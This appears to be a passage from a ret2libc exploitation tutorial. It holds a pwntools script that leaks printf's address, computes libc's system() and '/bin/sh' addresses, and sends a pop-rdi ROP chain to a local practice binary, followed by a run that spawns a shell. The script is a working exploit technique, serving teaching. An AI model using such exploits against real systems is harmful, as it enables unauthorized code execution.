...
# Python 2 pwntools script (note the `print` statements) for a ret2libc
# exercise against a local binary './ret2libc'.
#
# Flow: the target prints the runtime address of printf(), the script
# subtracts a libc-build-specific offset to recover the libc base, then
# derives system() and a "/bin/sh" string from that base and returns into
# system() through a `pop rdi; ret` gadget.
#
# Defender's reading: the single info leak is what defeats ASLR here; the
# gadget lives at a fixed 0x400... address, which suggests the binary is
# not PIE (confirm with checksec), and the linear overwrite of the saved
# return address implies no stack canary is in play (or it is not checked).
# Every libc offset below (0x55800, 0x45390, 0x18cd57) is tied to the
# tutorial's exact libc build and will be wrong for any other.
from pwn import *
p = process('./ret2libc')
# Consume output up to the leak prompt, then read the leaked value line.
p.recvuntil('Printf() address : ')
stackAddr = p.recvuntil('\n')
# The string still carries the trailing newline; int() tolerates that.
# NOTE(review): despite its name this holds the leaked printf() address.
stackAddr = int(stackAddr,16)
# 0x55800 is presumably printf's offset inside this libc build — confirm.
libcBase = stackAddr - 0x55800
# system() and "/bin/sh" offsets for the same libc build — confirm likewise.
sysAddr = libcBase + 0x45390
binsh = libcBase + 0x18cd57
# `pop rdi; ret` gadget inside the binary itself (fixed address, non-PIE).
poprdi = 0x400763
print hex(libcBase)
print hex(sysAddr)
print hex(binsh)
print hex(poprdi)
# p64() yields 8 bytes, so the padding is 72 bytes before the overwritten
# return address; the offset itself comes from the author's analysis.
exploit = "A" * (80 - len(p64(sysAddr)))
# Chain: ret -> pop rdi (rdi = "/bin/sh") -> system(rdi).
exploit += p64(poprdi)
exploit += p64(binsh)
exploit += p64(sysAddr)
p.send(exploit)
p.interactive()
lazenca0x0@ubuntu:~/Exploit/RTL$ python Exploit.py
[+] Starting local process './ret2libc': pid 10291
0x7f61413b6000
0x7f61413fb390
0x7f6141542d57
0x400763
[*] Switching to interactive mode
$ id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$
...